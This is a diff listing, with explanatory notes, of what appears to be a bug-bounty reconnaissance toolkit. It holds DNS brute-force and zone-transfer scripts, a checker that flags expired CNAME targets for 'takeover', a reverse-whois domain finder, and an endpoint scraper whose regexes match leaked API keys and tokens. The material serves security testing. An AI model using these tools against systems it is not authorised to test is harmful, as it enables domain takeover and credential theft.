    45  - if cve[0] in mod['moduleName']:
    46  - return [ mod['moduleName'], mod['userName'], mod['dateAdded'] ]
    47  - return 1
    48  - return 0
    49  - 
    50  -with open('detectify-modules.json') as json_file:
    51  - j_detectify = json.load(json_file)
    52  - t_modules = j_detectify['data']['widgets']['AllModulesList']['props']['changed']['modules']
    53  - 
    54  -with open('allitems.csv') as csv_file:
    55  - i = 0
    56  - csv_reader = csv.reader(csv_file, delimiter=',')
    57  - for cve in reversed(list(csv_reader)):
    58  - if "** RESERVED **" not in cve[2]:
    59  - r = search_module( cve, search, detectify )
    60  - if r != 0:
    61  - if detectify == 0 or type(r) is list:
    62  - i = i + 1
    63  - #sys.stdout.write("https://cve.mitre.org/cgi-bin/cvename.cgi?name=%s - %s..." % (cve[0],cve[2][:150]))
    64  - sys.stdout.write("https://cve.mitre.org/cgi-bin/cvename.cgi?name=%s - %s..." % (cve[0],cve[2][:150]))
    65  - if type(r) is list:
    66  - sys.stdout.write( colored(" -> %s - %s - %s" % (r[0],r[1],r[2]),"red") )
    67  - if detectify == 0 or type(r) is list:
    68  - sys.stdout.write("\n")
    69  - if limit and i >= limit:
    70  - break
    71  - 
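For reference, the matching logic of `search_module()` can be expressed without the CSV plumbing. The data below is hypothetical; the return convention is the script's own (module info list on a hit, `1` when the keyword matched but no module exists, `0` on a miss).

```python
def search_module(cve_id, description, modules, keyword=""):
    """Return [name, user, date] when a module covers the CVE,
    1 when the keyword matched but no module exists, 0 otherwise."""
    if keyword and keyword.lower() not in description.lower():
        return 0
    for mod in modules:
        if cve_id in mod["moduleName"]:
            return [mod["moduleName"], mod["userName"], mod["dateAdded"]]
    return 1
```

The mixed return types (list/int) mirror the original; a cleaner design would return an enum plus an optional payload.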
    dnsenum-brute.sh
    1 1  #!/bin/bash
    2 2   
    3 3  function usage() {
    4  - echo "Usage: "$0" <domain> <subdomain_file> [<dns_server>]"
     4 + echo "Usage: "$0" <domain> <wordlist> [<dns_server>]"
    5 5   if [ -n "$1" ] ; then
    6  - echo "Error: "$1"!"
     6 + echo "Error: "$1"!"
    7 7   fi
    8 8   exit
    9 9  }
    skipped 30 lines
    dnsenum-bruten.sh
    skipped 2 lines
    3 3  function usage() {
    4 4   echo "Usage: "$0" <prefix> <suffix> [<dns_server>]"
    5 5   if [ -n "$1" ] ; then
    6  - echo "Error: "$1"!"
     6 + echo "Error: "$1"!"
    7 7   fi
    8 8   exit
    9 9  }
    skipped 36 lines
    dnsenum-reverse.sh
    skipped 2 lines
    3 3  function usage() {
    4 4   echo "Usage: "$0" <ip> <domain> [<dns_server>]"
    5 5   if [ -n "$1" ] ; then
    6  - echo "Error: "$1"!"
     6 + echo "Error: "$1"!"
    7 7   fi
    8 8   exit
    9 9  }
    skipped 24 lines
    dnsenum-reverserange.sh
    skipped 2 lines
    3 3  function usage() {
    4 4   echo "Usage: "$0" <range_file> <domain> [<dns_server>]"
    5 5   if [ -n "$1" ] ; then
    6  - echo "Error: "$1"!"
     6 + echo "Error: "$1"!"
    7 7   fi
    8 8   exit
    9 9  }
    skipped 16 lines
    dnsenum-zonetransfer.sh
    skipped 2 lines
    3 3  function usage() {
    4 4   echo "Usage: "$0" <domain>"
    5 5   if [ -n "$1" ] ; then
    6  - echo "Error: "$1"!"
     6 + echo "Error: "$1"!"
    7 7   fi
    8 8   exit
    9 9  }
    skipped 6 lines
    16 16  n=0
    17 17   
    18 18  for server in $(host -t ns $domain |cut -d ' ' -f 4) ; do
    19  - tmp=`host -l $1 $server |grep 'has address' | tr "\n" "|"`
     19 + tmp=`host -l $1 $server | grep 'has address' | tr "\n" "|"`
    20 20   if [ -n "$tmp" ] ; then
    21  - echo $tmp | tr "|" "\n"
    22  - n=1
     21 + echo $tmp | tr "|" "\n"
     22 + n=1
    23 23   fi
    24 24  done
    25 25   
    skipped 6 lines
    dnsexpire.py
    1  -#!/usr/bin/python3
    2  - 
    3  -# I don't believe in license.
    4  -# You can do whatever you want with this program.
    5  - 
    6  -import os
    7  -import sys
    8  -import re
    9  -import socket
    10  -# import whois
    11  -import pythonwhois
    12  -import subprocess
    13  -import argparse
    14  -import tldextract
    15  -from colored import fg, bg, attr
    16  -from datetime import datetime
    17  -from threading import Thread
    18  -from queue import Queue
    19  -from multiprocessing.dummy import Pool
    20  - 
    21  - 
    22  -def banner():
    23  - print("""
    24  - _ _
    25  - __| |_ __ ___ _____ ___ __ (_)_ __ ___ _ __ _ _
    26  - / _` | '_ \/ __|/ _ \ \/ / '_ \| | '__/ _ \ | '_ \| | | |
    27  - | (_| | | | \__ \ __/> <| |_) | | | | __/ _ | |_) | |_| |
    28  - \__,_|_| |_|___/\___/_/\_\ .__/|_|_| \___| (_) | .__/ \__, |
    29  - |_| |_| |___/
    30  - 
    31  - by @gwendallecoguic
    32  - 
    33  -""")
    34  - pass
    35  - 
    36  -banner()
    37  - 
    38  - 
    39  -ALERT_LIMIT = 30
    40  - 
    41  -parser = argparse.ArgumentParser()
    42  -parser.add_argument( "-a","--all",help="also test dead hosts and non-aliases", action="store_true" )
    43  -parser.add_argument( "-o","--host",help="set host, can be a file or single host" )
    44  -parser.add_argument( "-t","--threads",help="threads, default 10" )
    45  -parser.add_argument( "-v","--verbose",help="display output, can be: 0=everything, 1=only alias, 2=only possible vulnerable, default 1" )
    46  -parser.parse_args()
    47  -args = parser.parse_args()
    48  - 
    49  -if args.threads:
    50  - _threads = int(args.threads)
    51  -else:
    52  - _threads = 10
    53  - 
    54  -if args.verbose:
    55  - _verbose = int(args.verbose)
    56  -else:
    57  - _verbose = 1
    58  - 
    59  -if args.all:
    60  - _testall = True
    61  -else:
    62  - _testall = False
    63  - 
    64  -t_hosts = []
    65  -if args.host:
    66  - if os.path.isfile(args.host):
    67  - fp = open( args.host, 'r' )
    68  - t_hosts = fp.read().strip().split("\n")
    69  - fp.close()
    70  - else:
    71  - t_hosts = [args.host]
    72  - 
    73  -n_host = len(t_hosts)
    74  - 
    75  -if not n_host:
    76  - parser.error( 'hosts list missing' )
    77  - 
    78  -sys.stdout.write( '%s[+] %d hosts loaded: %s%s\n' % (fg('green'),n_host,args.host,attr(0)) )
    79  -sys.stdout.write( '[+] resolving...\n\n' )
    80  - 
    81  - 
    82  -def resolve( host ):
    83  - try:
    84  - cmd = 'host ' + host
    85  - # print(cmd)
    86  - output = subprocess.check_output( cmd, stderr=subprocess.STDOUT, shell=True ).decode('utf-8')
    87  - # print( output )
    88  - except Exception as e:
    89  - # sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
    90  - output = ''
    91  - 
    92  - return output
    93  - 
    94  - 
    95  -def getDomain( host ):
    96  - t_host_parse = tldextract.extract( host )
    97  - return t_host_parse.domain + '.' + t_host_parse.suffix
    98  - 
    99  - 
    100  -def getWhois( domain ):
    101  - if not domain in t_whois_history:
    102  - try:
    103  - w = pythonwhois.get_whois( domain )
    104  - # w = whois.whois( domain )
    105  - t_whois_history[ domain ] = w
    106  - except Exception as e:
    107  - sys.stdout.write( "%s[-] error occurred: %s (%s)%s\n" % (fg('red'),e,domain,attr(0)) )
    108  - return False
    109  - 
    110  - return t_whois_history[domain]
    111  - 
    112  - 
    113  -def getExpirationDate( domain ):
    114  - whois = getWhois( domain )
    115  - # print(type(whois))
    116  - 
    117  - if not type(whois) is bool and 'expiration_date' in whois:
    118  - # if type(whois.expiration_date) is list:
    119  - # return whois.expiration_date[0]
    120  - # else:
    121  - # return whois.expiration_date
    122  - if type(whois['expiration_date']) is list:
    123  - return whois['expiration_date'][0]
    124  - else:
    125  - return whois['expiration_date']
    126  - return False
    127  - else:
    128  - return False
    129  - 
    130  - 
    131  -def getColor( expiration_date ):
    132  - # expiration_date = datetime(2019, 12, 29, 6, 56, 55)
    133  - timedelta = expiration_date - datetime.now()
    134  - # print(timedelta)
    135  - 
    136  - if timedelta.days < -1: # to avoid false positive from smart whois who always return the current date
    137  - return 'light_red'
    138  - elif timedelta.days < ALERT_LIMIT:
    139  - return 'light_yellow'
    140  - else:
    141  - return 'light_green'
    142  - 
    143  - 
    144  -def printExpirationDate( domain ):
    145  - expiration_date = getExpirationDate( domain )
    146  - # print(type(expiration_date))
    147  - 
    148  - if type(expiration_date) is datetime:
    149  - color = getColor( expiration_date )
    150  - if color == 'light_red':
    151  - alert = 'TRY TAKEOVER!!'
    152  - elif color == 'light_yellow':
    153  - alert = 'WARNING!'
    154  - else:
    155  - alert = ''
    156  - return '%s%s %s%s\n' % (fg(color),expiration_date,alert,attr(0))
    157  - else:
    158  - return '%serror%s\n' % (fg('red'),attr(0))
    159  - 
    160  - 
    161  -def dnsexpire( host ):
    162  - sys.stdout.write( 'progress: %d/%d\r' % (t_multiproc['n_current'],t_multiproc['n_total']) )
    163  - t_multiproc['n_current'] = t_multiproc['n_current'] + 1
    164  - output = ''
    165  - 
    166  - resolution = resolve( host )
    167  - if resolution == '':
    168  - is_alias = False
    169  - if not _testall:
    170  - if not _verbose:
    171  - sys.stdout.write( '%s%s doesn\'t resolve%s\n' % (fg('dark_gray'),host,attr(0)) )
    172  - return
    173  - else:
    174  - is_alias = re.findall( r'(.*) is an alias for (.*)\.', resolution );
    175  - # print(is_alias)
    176  - 
    177  - if not _testall and not is_alias:
    178  - if not _verbose:
    179  - sys.stdout.write( '%s%s is not an alias%s\n' % (fg('dark_gray'),host,attr(0)) )
    180  - return
    181  - 
    182  - if _testall:
    183  - domain = getDomain( host )
    184  - output = output + "%s -> %s -> " % (host,domain)
    185  - output = output + printExpirationDate( domain )
    186  - 
    187  - if is_alias:
    188  - for alias in is_alias:
    189  - domain = getDomain( alias[1] )
    190  - output = output + ("%s is an alias for %s -> %s -> " % (alias[0],alias[1],domain))
    191  - output = output + printExpirationDate( domain )
    192  - 
    193  - if _verbose < 2 or ('WARNING' in output or 'TAKEOVER' in output): # remove the "progress:" text
    194  - sys.stdout.write( '%s\n%s' % (' '.rjust(100,' '),output) )
    195  - 
    196  - if not _testall:
    197  - sys.stdout.write( '\n' )
    198  - 
    199  - 
    200  -def doWork():
    201  - while True:
    202  - host = q.get()
    203  - dnsexpire( host )
    204  - q.task_done()
    205  - 
    206  - 
    207  - 
    208  -t_whois_history = {}
    209  -t_multiproc = {
    210  - 'n_current': 0,
    211  - 'n_total': n_host
    212  -}
    213  - 
    214  -q = Queue( _threads*2 )
    215  - 
    216  -for i in range(_threads):
    217  - t = Thread( target=doWork )
    218  - t.daemon = True
    219  - t.start()
    220  - 
    221  -try:
    222  - for host in t_hosts:
    223  - q.put( host )
    224  - q.join()
    225  -except KeyboardInterrupt:
    226  - sys.exit(1)
    227  - 
    228  - 
    229  -sys.stdout.write( '\n%s[+] finished%s\n' % (fg('green'),attr(0)) )
    230  - 
    231  -exit()
    232  - 
    233  - 
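The traffic-light logic in `getColor()` boils down to a day-count comparison against the expiry date. A minimal sketch (names are mine; the `-1` slack mirrors the script's own comment about whois servers that always echo the current date):

```python
from datetime import datetime

ALERT_LIMIT = 30  # days before expiry that should raise a warning

def classify(expiration_date, now=None):
    """Traffic-light classification of a domain expiry date."""
    now = now or datetime.now()
    days = (expiration_date - now).days
    if days < -1:
        # strictly past: a candidate for takeover; the -1 avoids
        # false positives from whois servers echoing today's date
        return "takeover"
    if days < ALERT_LIMIT:
        return "warning"
    return "ok"
```

These three states map to the script's `light_red` / `light_yellow` / `light_green` output.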
    dnsreq-alltypes.sh
     1 +#!/bin/bash
     2 + 
     3 + 
     4 +function usage() {
     5 + echo "Usage: "$0" <(sub)domain>"
     6 + if [ -n "$1" ] ; then
     7 + echo "Error: "$1"!"
     8 + fi
     9 + exit
     10 +}
     11 + 
     12 +if [ ! $# -eq 1 ] ; then
     13 + usage
     14 +fi
     15 + 
     16 + 
     17 +t_types=("*" "A" "A6" "AAAA" "AFSDB" "AMTRELAY" "APL" "ATMA" "AVC" "AXFR" "CAA" "CDNSKEY" "CDS" "CERT" "CNAME" "CSYNC" "DHCID" "DLV" "DNAME" "DNSKEY" "DOA" "DS" "EID" "EUI48" "EUI64" "GID" "GPOS" "HINFO" "HIP" "IPSECKEY" "ISDN" "IXFR" "KEY" "KX" "L32" "L64" "LOC" "LP" "MAILA" "MAILB" "MB" "MD" "MF" "MG" "MINFO" "MR" "MX" "NAPTR" "NID" "NIMLOC" "NINFO" "NS" "NSAP" "NSAP-PTR" "NSEC" "NSEC3" "NSEC3PARAM" "NULL" "NXT" "OPENPGPKEY" "OPT" "PTR" "PX" "RKEY" "RP" "RRSIG" "RT" "SIG" "SINK" "SMIMEA" "SOA" "SPF" "SRV" "SSHFP" "TA" "TALINK" "TKEY" "TLSA" "TSIG" "TXT" "UID" "UINFO" "UNSPEC" "URI" "WKS" "X25" "ZONEMD")
     18 + 
     19 +n=0
     20 +i=0
     21 +total=${#t_types[@]}
     22 +domain=$1
     23 +echo "Trying $total types... $domain"
     24 +echo
     25 + 
     26 +host=$(host -t NS $domain)
     27 +# echo "$host"
     28 +has_ns=$(echo "$host" | grep " name server ")
     29 + 
     30 +if [ -n "$has_ns" ] ; then
     31 + ns=$(echo "$host" | awk '{print $NF}' | sed "s/\.$//")
     32 + # echo "$ns"
     33 + 
     34 + for nnss in $(echo "$ns") ; do
     35 + for type in ${t_types[@]} ; do
     36 + rq=`timeout 3 host -4 -W 1 -t "$type" $domain $nnss 2>&1`
     37 + # echo "$rq"
     38 + 
     39 + fail=$(echo "$rq" | egrep "connection timed out|$domain has no|host: invalid type:|FORMERR|REFUSED|SERVFAIL|NOTAUTH|NXDOMAIN")
     40 + if [ ! -n "$fail" ] ; then
     41 + echo "-----------------------------"
     42 + echo "$domain -> $nnss -> $type"
     43 + echo "-----------------------------"
     44 + echo "$rq"
     45 + echo
     46 + echo
     47 + fi
     48 + 
     49 + done
     50 + done
     51 +fi
     52 + 
     53 + 
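The filter inside the loop above decides whether a `host -t <type>` reply is worth printing. The same failure test as a small Python helper; the pattern list is copied from the script's `egrep`, with `$domain has no` generalized to `has no` since the shell version interpolates the queried domain.

```python
import re

# failure markers mirrored from the script's egrep
FAIL_RE = re.compile(
    r"connection timed out|has no|host: invalid type:"
    r"|FORMERR|REFUSED|SERVFAIL|NOTAUTH|NXDOMAIN"
)

def is_interesting(host_output):
    """True when a `host` reply contains none of the failure markers."""
    return not FAIL_RE.search(host_output)
```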
    domain-finder.py
    1  -#!/usr/bin/python3
    2  - 
    3  -# I don't believe in license.
    4  -# You can do whatever you want with this program.
    5  - 
    6  -import os
    7  -import sys
    8  -import requests
    9  -import argparse
    10  -from colored import fg, bg, attr
    11  - 
    12  -w_blacklist = [ 'privacy', 'redacted', 'dnstination', 'west' ]
    13  - 
    14  -def extractDatas( t_json ):
    15  - for index in ['technical_contact','registrant_contact','administrative_contact']:
    16  - if index in t_json:
    17  - company,email = extractData( t_json[index] )
    18  - if company and company not in t_datas['companies']:
    19  - t_datas['companies'].append( company )
    20  - if email and email not in t_datas['emails']:
    21  - t_datas['emails'].append( email )
    22  - 
    23  - 
    24  -def extractData( tab ):
    25  - # read fields from the contact dict passed in, not from
    26  - # t_json['registrant_contact'] (copy/paste bug in the original)
    27  - if 'company_name' in tab:
    28  - company = tab['company_name']
    29  - for wbl in w_blacklist:
    30  - if wbl in company.lower():
    31  - company = False
    32  - break
    33  - else:
    34  - company = False
    35  - 
    36  - if 'email_address' in tab:
    37  - email = tab['email_address']
    38  - for wbl in w_blacklist:
    39  - if wbl in email.lower():
    40  - email = False
    41  - break
    42  - else:
    43  - email = False
    44  - 
    45  - return company,email
    49  - 
    50  - 
    51  -parser = argparse.ArgumentParser()
    52  -parser.add_argument( "-e","--email",help="email you are looking for (required or -d or -c)" )
    53  -parser.add_argument( "-c","--company",help="company you are looking for (required or -d or -e)" )
    54  -parser.add_argument( "-d","--domain",help="domain you already know (required or -c)" )
    55  -parser.add_argument( "-k","--key",help="whoxy api key (required)" )
    56  -parser.add_argument( "-v","--verbose",help="enable verbose mode, default off", action="store_true" )
    57  -parser.parse_args()
    58  -args = parser.parse_args()
    59  - 
    60  -t_domains = []
    61  -t_datas = {
    62  - 'companies': [],
    63  - 'emails': []
    64  -}
    65  - 
    66  -if args.verbose:
    67  - _verbose = True
    68  -else:
    69  - _verbose = False
    70  - 
    71  -if args.company:
    72  - t_datas['companies'].append( args.company )
    73  - 
    74  -if args.email:
    75  - t_datas['emails'].append( args.email )
    76  - 
    77  -if args.domain:
    78  - _domain = args.domain
    79  -else:
    80  - _domain = False
    81  - 
    82  -if not _domain and not len(t_datas['companies']) and not len(t_datas['emails']):
    83  - parser.error( 'domain or company or email required' )
    84  - 
    85  -if args.key:
    86  - _key = args.key
    87  -else:
    88  - parser.error( 'api key is required' )
    89  - 
    90  - 
    91  -if _domain:
    92  - if _verbose:
    93  - sys.stdout.write( '%s[+] search for domain: %s%s\n' % (fg('green'),_domain,attr(0)) )
    94  - url = 'http://api.whoxy.com/?key='+_key+'&whois='+_domain
    95  - if _verbose:
    96  - print(url)
    97  - r = requests.get( url )
    98  - t_json = r.json()
    99  - # print(t_json)
    100  - extractDatas( t_json )
    101  - if _verbose:
    102  - print(t_datas)
    103  - 
    104  - 
    105  -for company in t_datas['companies']:
    106  - page = 1
    107  - company = company.replace( ' ', '+' )
    108  - if _verbose:
    109  - sys.stdout.write( '%s[+] search for company: %s%s\n' % (fg('green'),company,attr(0)) )
    110  - 
    111  - while True:
    112  - url = 'http://api.whoxy.com/?key='+_key+'&reverse=whois&company='+company+'&mode=micro&page='+str(page)
    113  - page = page + 1
    114  - if _verbose:
    115  - print(url)
    116  - r = requests.get( url )
    117  - t_json = r.json()
    118  - # print(t_json)
    119  - 
    120  - if 'search_result' in t_json and len(t_json['search_result']):
    121  - for result in t_json['search_result']:
    122  - if not result['domain_name'] in t_domains:
    123  - t_domains.append( result['domain_name'] )
    124  - print( result['domain_name'] )
    125  - else:
    126  - break
    127  - 
    128  - 
    129  -for email in t_datas['emails']:
    130  - page = 1
    131  - if _verbose:
    132  - sys.stdout.write( '%s[+] search for email: %s%s\n' % (fg('green'),email,attr(0)) )
    133  - 
    134  - while True:
    135  - url = 'http://api.whoxy.com/?key='+_key+'&reverse=whois&email='+email+'&mode=micro&page='+str(page)
    136  - page = page + 1
    137  - if _verbose:
    138  - print(url)
    139  - r = requests.get( url )
    140  - t_json = r.json()
    141  - # print(t_json)
    142  - 
    143  - if 'search_result' in t_json and len(t_json['search_result']):
    144  - for result in t_json['search_result']:
    145  - if not result['domain_name'] in t_domains:
    146  - t_domains.append( result['domain_name'] )
    147  - print( result['domain_name'] )
    148  - else:
    149  - break
    150  - 
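Both whoxy loops above share one pagination pattern: keep requesting pages until `search_result` comes back empty. Factored out below with an injected fetcher (`fetch_page` and its signature are my convention, not whoxy's API) so it can be exercised without an API key:

```python
def collect_domains(fetch_page):
    """Walk whoxy-style reverse-whois pages until an empty search_result.
    fetch_page(page_number) -> parsed JSON dict (injected for testability)."""
    domains = []
    page = 1
    while True:
        results = fetch_page(page).get("search_result", [])
        if not results:
            break
        for r in results:
            if r["domain_name"] not in domains:
                domains.append(r["domain_name"])
        page += 1
    return domains
```

In the real script, `fetch_page` would wrap `requests.get()` against `api.whoxy.com` with the key, mode, and company/email parameters shown above.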
    extract-domains.py
    1  -#!/usr/bin/python2
    2  - 
    3  -# I don't believe in license.
    4  -# You can do whatever you want with this program.
     1 +#!/usr/bin/python3
    5 2   
    6 3  import os
    7 4  import sys
    8 5  import argparse
    9 6  import tldextract
    10  -from urlparse import urlparse
    11  - 
     7 +from urllib.parse import urlparse
    12 8   
    13 9  parser = argparse.ArgumentParser()
    14 10  parser.add_argument( "-u","--urls",help="set urls list (required)" )
    skipped 32 lines
    47 43   t_found.append( found )
    48 44   
    49 45  print( "\n".join(t_found) )
    50  -exit()
    51 46   
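A stdlib-only sketch of what this script does at its core; the real version relies on `tldextract` to reduce hosts to registered domains, while plain `urlparse` only yields hostnames, so treat this as a simplified stand-in.

```python
from urllib.parse import urlparse

def extract_hosts(urls):
    """Collect unique hostnames from a list of URLs, keeping input order."""
    hosts = []
    for u in urls:
        if not u.startswith(("http://", "https://")):
            u = "http://" + u  # urlparse needs a scheme to populate netloc
        h = urlparse(u).netloc.lower()
        if h and h not in hosts:
            hosts.append(h)
    return hosts
```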
    extract-endpoints.php
    1  -#!/usr/bin/php
    2  -<?php
    3  - 
    4  -function usage( $err=null ) {
    5  - echo 'Usage: php '.$_SERVER['argv'][0]." -f/-d <source file/directory> [OPTIONS]\n\n";
    6  - echo "Options:\n";
    7  - echo "\t-b\tbeautify javascript files before parsing (requires js-beautify)\n";
    8  - echo "\t--bb\tbeautify and update source file (requires js-beautify)\n";
    9  - echo "\t-c\tsearch for comments instead of urls\n";
    10  - echo "\t-d\tset source directory (required)\n";
    11  - echo "\t-e\textensions to load (example: js,php,asp) (default: js)\n";
    12  - echo "\t-f\tset source file (required)\n";
    13  - echo "\t-g\tset regexp source file\n";
    14  - echo "\t--gg\tset regexp\n";
    15  - echo "\t-h\tforce host if none\n";
    16  - echo "\t-i\textensions we don't want to display separated by a comma (example: gif,jpg,png)\n";
    17  - echo "\t-k\tsearch for keywords instead of urls\n";
    18  - echo "\t-l\tfollow location\n";
    19  - echo "\t-n\textensions of files we don't want to read, separated by a comma (example: gif,jpg,png)\n";
    20  - echo "\t-r\talso scan subdirectories\n";
    21  - echo "\t-s\tforce https if no scheme\n";
    22  - echo "\t-t\ttest the urls found\n";
    23  - echo "\t-u\tremove duplicates (at your own risk!)\n";
    24  - echo "\t-v\tverbose mode: 0=all, 1=findings, 2=remove extra text\n";
    25  - echo "\n";
    26  - if( $err ) {
    27  - echo 'Error: '.$err."!\n";
    28  - }
    29  - exit();
    30  -}
    31  - 
    32  - 
    33  -require_once( 'Utils.php' );
    34  - 
    35  -define( 'MODE_ENDPOINT', 1 );
    36  -define( 'MODE_KEYWORD', 2 );
    37  -define( 'MODE_COMMENT', 3 );
    38  -define( 'DEFAULT_MODE', MODE_ENDPOINT );
    39  - 
    40  - 
    41  -$options = '';
    42  -$options .= 'b'; // beautify
    43  -$options .= 'c'; // looking for comments instead of endpoints
    44  -$options .= 'd:'; // source directory
    45  -$options .= 'e:'; // extension
    46  -$options .= 'f:'; // source file
    47  -$options .= 'g:'; // regexp file
    48  -$options .= 'h:'; // set host if none
    49  -$options .= 'i:'; // ignore extensions (list)
    50  -$options .= 'k'; // looking for keywords instead of endpoints
    51  -$options .= 'l'; // follow location
    52  -$options .= 'n:'; // ignore extensions (read)
    53  -$options .= 'r'; // recursive (scan subdir)
    54  -$options .= 's'; // force https
    55  -$options .= 't'; // test url
    56  -$options .= 'v:'; // verbose
    57  -$long_options = ['bb','gg:'];
    58  -$t_options = getopt( $options, $long_options );
    59  -//var_dump($t_options);
    60  -if( !count($t_options) ) {
    61  - usage();
    62  -}
    63  - 
    64  - 
    65  -if( isset($t_options['t']) ) {
    66  - $_test = true;
    67  -} else {
    68  - $_test = false;
    69  -}
    70  - 
    71  -if( isset($t_options['r']) ) {
    72  - $_recurs = true;
    73  -} else {
    74  - $_recurs = false;
    75  -}
    76  - 
    77  -if( isset($t_options['l']) ) {
    78  - $_location = true;
    79  -} else {
    80  - $_location = false;
    81  -}
    82  - 
    83  -if( isset($t_options['s']) ) {
    84  - $_scheme = 'https';
    85  -} else {
    86  - $_scheme = 'http';
    87  -}
    88  - 
    89  -if( isset($t_options['b']) || isset($t_options['bb']) ) {
    90  - $_beautify = true;
    91  -} else {
    92  - $_beautify = false;
    93  -}
    94  -if( isset($t_options['bb']) ) {
    95  - $_beautify_alter = true;
    96  -} else {
    97  - $_beautify_alter = false;
    98  -}
    99  - 
    100  -if( isset($t_options['h']) ) {
    101  - $_host = $t_options['h'];
    102  -} else {
    103  - $_host = null;
    104  -}
    105  - 
    106  -if( isset($t_options['v']) ) {
    107  - $_verbose = (int)$t_options['v'];
    108  -} else {
    109  - $_verbose = 0;
    110  -}
    111  - 
    112  -if( isset($t_options['f']) ) {
    113  - $f = $t_options['f'];
    114  - if( !is_file($f) ) {
    115  - usage( 'Source file not found' );
    116  - } else {
    117  - $_t_source = [$f];
    118  - }
    119  -} elseif( isset($t_options['d']) ) {
    120  - $d = $t_options['d'];
    121  - if( !is_dir($d) ) {
    122  - usage( 'Source directory not found' );
    123  - } else {
    124  - $d = rtrim( $d, '/' );
    125  - if( isset($t_options['e']) ) {
    126  - $_loadext = explode( ',', $t_options['e'] );
    127  - } else {
    128  - $_loadext = ['js'];
    129  - }
    130  - $_t_source = [];
    131  - foreach( $_loadext as $e ) {
    132  - if( $_recurs ) {
    133  - $output = null;
    134  - if( $e == '*' ) {
    135  - $cmd = 'find "'.escapeshellcmd($d).'" -type f 2>/dev/null';
    136  - } else {
    137  - $cmd = 'find "'.escapeshellcmd($d).'" -type f -name "*.'.$e.'" 2>/dev/null';
    138  - }
    139  - //echo $cmd."\n";
    140  - exec( $cmd, $output );
    141  - $_t_source = array_merge( $_t_source, $output );
    142  - } else {
    143  - if( $e == '*' ) {
    144  - $_t_source = array_merge( $_t_source, glob( $d.'/*.'.trim($e) ) );
    145  - } else {
    146  - $_t_source = array_merge( $_t_source, glob( $d.'/*.'.trim($e) ) );
    147  - }
    148  - }
    149  - }
    150  - }
    151  -} else {
    152  - usage();
    153  -}
    154  - 
    155  -if( isset($t_options['i']) ) {
    156  - $_ignore = explode( ',', $t_options['i'] );
    157  -} else {
    158  - $_ignore = null;
    159  -}
    160  - 
    161  -if( isset($t_options['n']) ) {
    162  - $_dontread = explode( ',', $t_options['n'] );
    163  -} else {
    164  - $_dontread = [];
    165  -}
    166  - 
    167  -$_url_chars = '[a-zA-Z0-9\-\.\?\#&=_:/]';
    168  -$_regexp = [
    169  - '|["]('.$_url_chars.'+/'.$_url_chars.'+)?["]|',
    170  - '#[\'"\(].*(http[s]?://.*?)[\'"\)]#',
    171  - '#[\'"\(](http[s]?://.*?).*[\'"\)]#',
    172  - '#[\'"\(]([^\'"\(]*\.sdirect[^\'"\(]*?)[\'"\)]#',
    173  - '#[\'"\(]([^\'"\(]*\.htm[^\'"\(]*?)[\'"\)]#',
    174  - '#[\'"\(]([^\'"\(]*\.html[^\'"\(]*?)[\'"\)]#',
    175  - '#[\'"\(]([^\'"\(]*\.php[^\'"\(]*?)[\'"\)]#',
    176  - '#[\'"\(]([^\'"\(]*\.asp[^\'"\(]*?)[\'"\)]#',
    177  - '#[\'"\(]([^\'"\(]*\.aspx[^\'"\(]*?)[\'"\)]#',
    178  - //'#[\'"\(]([^\'"\(]*\.json[^\'"\(]*?)[\'"\)]#',
    179  - //'#[\'"\(]([^\'"\(]*\.xml[^\'"\(]*?)[\'"\)]#',
    180  - //'#[\'"\(]([^\'"\(]*\.ini[^\'"\(]*?)[\'"\)]#',
    181  - //'#[\'"\(]([^\'"\(]*\.conf[^\'"\(]*?)[\'"\)]#',
    182  - //'#href\s*=\s*[\'"](.*?)[\'"]#',
    183  - '#href\s*=\s*[\'](.*?)[\']#',
    184  - '#href\s*=\s*["](.*?)["]#',
    185  - '#src\s*=\s*[\'](.*?)[\']#',
    186  - '#src\s*=\s*["](.*?)["]#',
    187  - //'#src[\s]*=[\s]*[\'"](.*?)[>]#',
    188  - '#url\s*[:=].*[\'](.*?)[\']#',
    189  - '#url\s*[:=].*?["](.*?)["]#',
    190  - '#urlRoot\s*:.*[\'](.*?)[\']#',
    191  - '#urlRoot\s*:.*?["](.*?)["]#',
    192  - '#endpoint[s]?\s*:.*[\'](.*?)[\']#',
    193  - '#endpoint[s]?\s*:.*?["](.*?)["]#',
    194  - '#[\'"]script[\'"]\s*:\s*[\'"](.*?)[\'"]#',
    195  - '#\.ajax\s*\(\s*[\'"](.*?)[\'"]#',
    196  - '#\.get\s*\(\s*[\'"](.*?)[\'"]#',
    197  - '#\.post\s*\(\s*[\'"](.*?)[\'"]#',
    198  - '#\.load\s*\(\s*[\'"](.*?)[\'"]#',
    199  - //'#href|src\s*=\s*["](.*?)["]#',
    200  - //'#href|src\s*=\s*[\'](.*?)[\']#',
    201  - //'#endpoint[s]?|url|urlRoot|href\s*:.*["](.*?)["]#',
    202  - //'#endpoint[s]?|url|urlRoot|src\s*:.*[\'](.*?)[\']#',
    203  -];
    204  -$_comment = [
    205  - '#<!--(.*?)-->#s', // <!-- ... -->
    206  - '#/\*(.*?)\*/#s', // /* ... */
    207  - '#//(.*)#', // // ...
    208  -];
    209  -$_comments_regexp = '('.implode( '|', $_comment ).')';
    210  -$_keywords_sensitive = [
    211  - '[a-fA-F0-9]{32}(?:[a-fA-F0-9]{8})?(?:[a-fA-F0-9]{16})?(?:[a-fA-F0-9]{8})?(?:[a-fA-F0-9]{32})?(?:[a-fA-F0-9]{32})?', // mdx
    212  - //'[\'\"][a-f0-9]{32}[\'\"]', // md5
    213  - '[\'\"][a-f0-9]{40}[\'\"]', // sometimes...
    214  - '[1-9][0-9]+-[0-9a-zA-Z]{40}', // Twitter
    215  - 'EAACEdEose0cBA[0-9A-Za-z]+', // Facebook
    216  - 'AIza[_0-9A-Za-z\-]{35}', // YouTube/Gmail/Gdrive api key
    217  - '[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com', // YouTube/Gmail/Gdrive oauth id
    218  - 'sk_live_[0-9a-z]{32}', // Picatic
    219  - 'sk_live_[0-9a-zA-Z]{24}', // Stripe standard restricted
    220  - 'rk_live_[0-9a-zA-Z]{24}', // Stripe
    221  - 'sq0atp-[_0-9A-Za-z\-]{22}', // Square access token
    222  - 'sq0csp-[_0-9A-Za-z\-]{43}', // Square oauth secret
    223  - 'access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}', // PayPal Braintree
